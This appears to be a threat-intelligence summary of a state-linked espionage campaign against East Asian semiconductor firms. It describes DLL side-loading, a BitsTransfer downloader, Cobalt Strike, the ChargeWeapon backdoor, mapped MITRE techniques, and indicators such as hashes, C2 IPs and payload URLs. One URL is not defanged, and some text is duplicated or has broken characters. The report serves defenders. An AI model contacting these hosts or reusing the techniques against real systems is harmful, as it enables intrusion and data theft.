EclecticIQ identifies a Chinese state-sponsored cyber-espionage campaign targeting East Asiaβs semiconductor sector, using HyperBro loader with DLL-side loading, a Cobra DocGuard-hosted downloader, and a GO-based backdoor named ChargeWeapon to exfiltrate data and maintain persistence. The operation shows strong overlaps with PRC-backed threat activity and employs signed binaries, Cobalt Strike, and social engineering lures aimed at Mandarin-speaking regions around Taiwan, Hong Kong, and Singapore.
#HyperBro #ChargeWeapon #CobraDocGuard #RedHotel #AP27 #Budworm #CobaltStrike #TSMC
#HyperBro #ChargeWeapon #CobraDocGuard #RedHotel #AP27 #Budworm #CobaltStrike #TSMC
Keypoints
- Campaign targets Mandarin-speaking East Asia semiconductor interests (Taiwan, Hong Kong, Singapore) using a TSMC-themed lure.
- HyperBro loader runs Cobalt Strike beacon in memory via DLL-side loading using a signed CyberArk binary (vfhost.exe).
- A second-stage downloader on Cobra DocGuard server fetches Cobalt Strike payloads and loads them via DLL side-loading.
- The Cobra DocGuard server hosts ChargeWeapon, a GO-based backdoor that collects host data and reports to a C2 server.
- Decoy PDF lures in Mandarin aim to minimize user suspicion while malware executes in the background.
- Attribution links to PRC-backed groups (e.g., RedHotel/APT27/Budworm) and shared infrastructure with Hong Kong targets.
MITRE Techniques
- [T1574.002] DLL Side-Loading β DLL side-loading attacks use the DLL search order mechanism in Windows to plant and invoke a legitimate application that executes a malicious DLL payload. Quote: ββ¦DLL side-loading attacks use the DLL search order mechanism in Windows to plant and invoke a legitimate application that executes a malicious DLL payloadβ¦β
- [T1105] Ingress Tool Transfer β The BitsTransfer module in PowerShell is used to fetch malicious binaries from a Cobra DocGuard server. Quote: βThis downloader utilizes the BitsTransfer module in PowerShell to fetch malicious binaries from a very likely compromised Cobra DocGuard server.β
- [T1059.001] PowerShell β PowerShell-based download and execution workflow observed, including the Start-BitsTransfer usage. Quote: βThe PowerShell command line execution after the successful infection of the Cobalt Strike downloader: Start-BitsTransfer -Source β¦β
- [T1071.001] Web Protocols β The Cobalt Strike beacon uses a C2 profile and disguises traffic (Malleable C2) to resemble normal web traffic. Quote: βA Malleable C2 profile specifies how the beacon will transform and store data in a transaction to its C2 server. This technique is used for evasion of traditional firewall defenses.β
- [T1140] Deobfuscate/Decode Files or Information β The XOR-encrypted payload is decrypted with a one-byte length key (0x01). Quote: βThe shellcode decryption routine uses a one-byte length key (0x01) to decrypt the XOR-encrypted Cobalt Strike payload.β
- [T1036.005] Masquerading β The threat actor masquerades components as legitimate binaries (e.g., securityhealthservice.exe, vfhost.exe). Quote: βMasqueraded names included securityhealthservice.exe, secu.exe, vfhost.exe, vxhost.exe, vx.exe, and v.exe.β
- [T1047] Windows Management Instrumentation β WMI-based execution is used for lateral movement or execution. Quote: βWindows Management Instrumentation (WMI) execution.β
- [T1566.001] Phishing: Spearphishing Attachment β A decoy PDF themed around Taiwan Semiconductor Manufacturing is used to lure victims. Quote: βThe threat actor used a TSMC-themed PDF as a decoy, displayed after the execution of the HyperBro loader.β
- [T1036.005] Masquerading β Reiterated for the tactic of disguising as legitimate software in distributed components. Quote: βMasquerading: Match Legitimate Name or Location β T1036.005β
- [T1140] Deobfuscate/Decode Files or Information β Reiterated in the appendix for the XOR-based decryption of shellcode. Quote: βThe decryption routine uses a one-byte length key (0x01) to decrypt the XOR-encrypted Cobalt Strike payload.β
Indicators of Compromise
- [Hash] 12e1f50d7c9cf546c90545588bc369fa90e03f2370883e7befd87e4d50ebf0df β HyperBro loader variant artifact
- [Hash] 7229bb62acc6feca55d05b82d2221be1ab0656431953012ebad7226adc63643b β secondary loader/downloader artifact
- [Hash] df847abbfac55fb23715cde02ab52cbe59f14076f9e4bd15edbe28dcecb2a348 β downloader/artifact component
- [Hash] 45e7ce7b539bfb4f780c33faa1dff523463907ec793ff5d1e94204a8a6a00ab5 β Cobalt Strike shellcode artifact
- [Hash] 56f94f1df0338d254d0421e7baf17527817607a60c6f9c71108e60a12d7d6dcf β additional loader/downloader artifact
- [IP] 38.54.119.239 β C2 IP for HyperBro/Cobalt Strike beacon
- [IP] 45.77.37.145 β C2 IP for ChargeWeapon GO backdoor
- [IP] 45.32.33.17 β Additional C2-related host IP
- [IP] 23.224.61.12 β Secondary C2-related host IP
- [IP] 154.93.7.99 β Cobra DocGuard server hosting downloader components
- [URL] http://38.54.119.239:443/jquery-3.3.1.min.js β Malleable C2 disguise payload
- [URL] hxxp://154.93.7.99:8090/CDGServer3/images/zh/mcvsocfg.dll β Cobra DocGuard downloader component
- [URL] hxxp://154.93.7.99:8090/CDGServer3/images/zh/mcods.exe β Cobra DocGuard downloader component
- [URL] hxxp://154.93.7.99:8090/CDGServer3/images/zh/bin.config β Cobalt Strike shellcode config